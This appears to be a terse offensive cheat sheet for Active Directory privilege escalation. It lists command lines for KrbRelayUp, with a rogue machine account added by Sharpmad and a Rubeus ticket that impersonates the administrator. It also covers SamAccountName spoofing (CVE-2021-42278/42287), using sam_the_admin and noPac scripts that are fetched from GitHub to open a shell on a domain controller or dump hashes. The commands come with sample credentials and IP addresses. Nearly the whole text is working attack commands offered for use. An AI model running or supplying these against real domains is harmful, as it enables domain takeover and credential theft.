Active Directory Privilege Escalation
KrbRelayUp
Universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)
https://github.com/Dec0ne/KrbRelayUp
Sharpmad.exe MAQ -Action new -MachineAccount evilcomputer -MachinePassword pass.123
$o = ([ADSI]"LDAP://CN=evilcomputer,CN=Computers,DC=ecorp,DC=local").objectSID
(New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value
CheckPort.exe
Rubeus.exe s4u /user:evilcomputer$ /rc4:DBA335196E8CE3DEDB7140452ADEE42D /impersonateuser:administrator /msdsspn:host/desktop12 /ptt
Exploited**: SamAccountName spoofing** (CVE-2021-42287/CVE-2021-42278)
wget <https://raw.githubusercontent.com/WazeHell/sam-the-admin/main/sam_the_admin.py>; chmod +x sam_the_admin.py
python3 sam_the_admin.py "caltech/alice.cassie:Lee@tPass" -dc-ip 192.168.1.110 -shell
python3 sam_the_admin.py "caltech/alice.cassie:Lee@tPass" -dc-ip 192.168.1.110 -dump
CVE-2021-42278
net user sakshi
git clone <https://github.com/Ridter/noPac>; cd noPac; chmod +x noPac.py;
python3 noPac.py ignite.local/sakshi:'Password@1' -dc-ip 192.168.1.182 -shell --impersonate administrator -use-ldap
GetST
python noPac.py cgdomain.com/sanfeng:'1qaz@WSX' -dc-ip 10.211.55.203